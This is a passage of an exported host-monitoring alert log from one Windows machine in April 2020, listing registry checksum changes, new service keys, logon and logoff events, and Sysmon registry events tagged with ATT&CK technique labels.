changed. +Old md5sum was: '92492b6125d7a64a6c867269318db81a' +New md5sum is : 'd214e1c99f049d2e5a4f7f5c293113d9' +Old sha1sum was: '95e95e5c4e1f969e302d45ad055d83e5811ca397' +New sha1sum is : '6942a4383d9a87a8db70eb1102e33fe4494b4782' +", +"Apr 24, 2020 @ 13:24:56.450",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:56.435",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:55.188",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:55.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:53.859",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: '06f5c6f330af834dd08ce904d9ae7cc8' +New md5sum is : 'f5ea91602eb594fc2b4973f59a513fcb' +Old sha1sum was: '0cf4c4c19a1201e41b9deba273320298f4f97b50' +New sha1sum is : '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +", +"Apr 24, 2020 @ 13:24:52.342",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '25ef42efe37ad3eed184fd9bb31305d4' +New md5sum is : '2ca97e7a7da354ebc7e5aecb4fd0dd74' +Old sha1sum was: '4aa3eb6eb04b0d62d1a922458a12321e137ff48b' +New sha1sum is : '19f8d989d00dbb71464984cf5348341557224c0b' +", +"Apr 24, 2020 @ 13:24:47.857",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '106c676c812191a74d1c845f04603231' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : '935b4cfc84744b913c948f1140563c880fa44307' +", +"Apr 24, 2020 @ 13:24:45.638",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327' +New md5sum is : 'abe41aab895e504aa874d1b2b8792e94' +Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00' +New sha1sum is : '9daf66238ba18f6f989346a0d4ba77fa2e949329' +", +"Apr 24, 2020 @ 13:24:45.622",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '5b91e535422785d7409df5362ceec530' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '4e27ba555e6d427aef066e320154eafec1fd64e2' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 13:24:41.685",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : '2ca0234a1640c58e3cf365df8754d248' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '7a25eda1526e7a85edeb507dbb982f86dbe534cf' +", +"Apr 24, 2020 @ 13:24:39.592",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:21:35Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:24:38.372",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:38.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:37.920",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:37.904",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:36.560",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:36.544",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:36.057",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '50e564d651df4ed3711c530cb99d635a' +New md5sum is : '8879c1edeb0f0361bd37d770e7639bb2' +Old sha1sum was: '9f85b67a6c52e8312f838e2577ad0927a069eeda' +New sha1sum is : '17ce46a3267c30cb6b7fdcabb90044e72d2e065c' +", +"Apr 24, 2020 @ 13:24:32.451",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' checksum changed. +Old md5sum was: 'b58c019384b3299402dbe5a0e22d2728' +New md5sum is : 'dc2df5dbbab1052bb3dc7682d9824775' +Old sha1sum was: 'adf5c3a1c0ff6a1ecdcd328f5d2ad52bb15b804a' +New sha1sum is : '4f8a48eef364efe98f3530d61a38ca5a604a69cf' +", +"Apr 24, 2020 @ 13:24:31.185",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +", +"Apr 24, 2020 @ 13:24:29.844",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:29.826",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_42bf6\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:24:29.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:25.861",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'f93d80905ae8d4f7b3b1d14093e01cfb' +New md5sum is : 'da625c8cf22cc0a4471299dbe03060f6' +Old sha1sum was: '76dfbf0000655365da25fcaeae59a5577fea6d3e' +New sha1sum is : '4c16ffbbf8910ea5a4e1b2691c06b4ab9145d730' +", +"Apr 24, 2020 @ 13:24:19.015",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '1c6e2319780c0264f929f3c3433add82' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'f924403989ef2de336c156640b73fb0db5024306' +", +"Apr 24, 2020 @ 13:24:07.920",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '318460bc67692e1abeb6ac8620e2d5d2' +New md5sum is : '91bd294bc9340f876221b0364846313c' +Old sha1sum was: 'f3d4f1d8d84044bd1af1d2710eba79efdc96081d' +New sha1sum is : '05071c4f129dc58b432f2c6efee6e5e77e508fb7' +", +"Apr 24, 2020 @ 13:24:06.788",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:23:59.998",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: 'ceb071f7c3931d375ab5d39f59ceb095' +New md5sum is : 'b69fb06bf4f8bcc8374fe205ab23bb82' +Old sha1sum was: 'e67a17f8a2b27be4d2f41ac9baaed61e4f01e5e4' +New sha1sum is : '334dc05d67cd44aa3f53ce819fe13797e33e765f' +", +"Apr 24, 2020 @ 13:23:58.575",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:58.545",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:58.467",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:58.452",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:57.877",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:57.870",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:57.234",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:57.221",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:57.014",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:56.970",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:53.098",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:53.081",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:52.872",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:52.858",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:52.794",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:52.780",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:50.404",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:50.388",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 13:23:50.373",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 13:23:50.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 13:23:50.341",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 13:23:50.325",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:23:50.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:49.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:49.294",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:48.997",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '8bb6c0956c2766c58c1a9a1efc45a28c' +New md5sum is : 'd77005a972ae3949d5bcdf863c022b59' +Old sha1sum was: '9987f79cd34a26b46e6fd604087e2270b8c49cf1' +New sha1sum is : '0527bcf7219af58f3e0dbc5775726f1f2f3b20ae' +", +"Apr 24, 2020 @ 13:23:48.982",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '105e7d5045a9d20c4e9bfe6e31c4d5f4' +New md5sum is : '98aad82331612821f04993f8d4e943fc' +Old sha1sum was: '3b1edbab1cd6af7b0103a1e985a900a15cd3d2f1' +New sha1sum is : '818d873bfd9a6f8062c754be90dfa34ae33223eb' +", +"Apr 24, 2020 @ 13:23:46.279",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:46.250",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:03.182",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:21:58Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:22:34.102",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 13:22:33.984",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:19.589",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x69243 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:22:19.511",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x6926C + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:22:19.458",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x6926C + Linked Logon ID: 0x69243 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:19.430",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x69243 + Linked Logon ID: 0x6926C + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:18.788",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 13:22:17.723",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:17.575",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:22:17.358",3,"The database engine attached a database",,"""SearchIndexer (4572,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:0022:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.001499 -0.001255 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.009504 -0.005318 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:40, WS:120K # 0K, PF:144K # 0K, P:144K) +[4] 0.000118 +J(0) +[5] - +[6] - +[7] - +[8] 0.001845 -0.000557 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.029629 -0.000149 (5) CM -0.029234 (2) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 132K, P:256K) +[10] 0.000217 -0.000106 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 8K, PF:96K # 96K, P:96K) +[11] 0.000017 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000054 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000007 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:22:17.230",3,"The database engine is starting a new instance",,"""SearchIndexer (4572,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:22:16.507",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:08.304488700Z"",""eventRecordID"":""1132"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:08.279\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:08.279"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:08.279 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:16.259",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.853984700Z"",""eventRecordID"":""1125"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.763\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 